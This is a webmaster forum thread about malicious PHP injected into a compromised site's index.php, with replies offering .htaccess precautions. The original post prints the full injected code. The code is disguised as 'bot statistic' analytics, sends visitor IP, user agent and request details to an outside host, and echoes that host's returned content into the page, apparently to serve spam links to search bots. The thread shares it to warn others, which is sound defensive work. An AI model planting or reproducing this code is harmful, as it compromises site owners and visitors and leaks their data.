PHP code on a compromised host

[seohug]

I found the following code on a site running on PHP. This site has dropped of my radar for a while and I was just checking out what to do it. There is no CMS, just PHP file with some includes ala header, footer..etc.

It appears hackers compromised the shared hosting server and dropped it at the end of index.php. It's not found anywhere else.

The code will only show up to G00gle Bots, and not when view it via browser. You can see the dropped links in the cache. Then it will serve links from base. It can do more as any content can be served within.

<?php     /*This code use for global bot statistic*/     
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); 
/*Looks for google search bot*/     $sReferer = '';     
if(isset($_SERVER['HTTP_REFERER']) === true)     {         $sReferer = strtolower($_SERVER['HTTP_REFERER']);     }     
if(!(strpos($sUserAgent, 'google') === false)) 
/*Bot comes*/     {         if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) 
/*Create bot analitics*/                     echo file_get_contents('http://openprotect1.net/Log/StatK/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer) );     } 
else     
{         if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) 
/*Create bot analitics*/                     echo file_get_contents('http://openprotect1.net/Log/StatK/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer));     } 
/*Statistic code end*/ ?>

The point here is to check your sites for files changes or at least the index for suspicious stuff. HTH

 

[AdamC]

Just a small tip,

If you're concerned about a hack like this, one small precaution you can take is to change the default index, using something like

DirectoryIndex home.php

in .htaccess

This wont stop the hack, but unless you reference index.php in your code, it'll not be run, so at least the site itself wont be compromised in googles eyes

A step further would be to specifically deny index.php in htaccess rather than 404'ing it.

 

[Thorn]

You are sure you pasted the right code?

That code just collects and echos non google users referrers from openprotect...?

 

[Thorn]

ah, i see - redirected. my bad.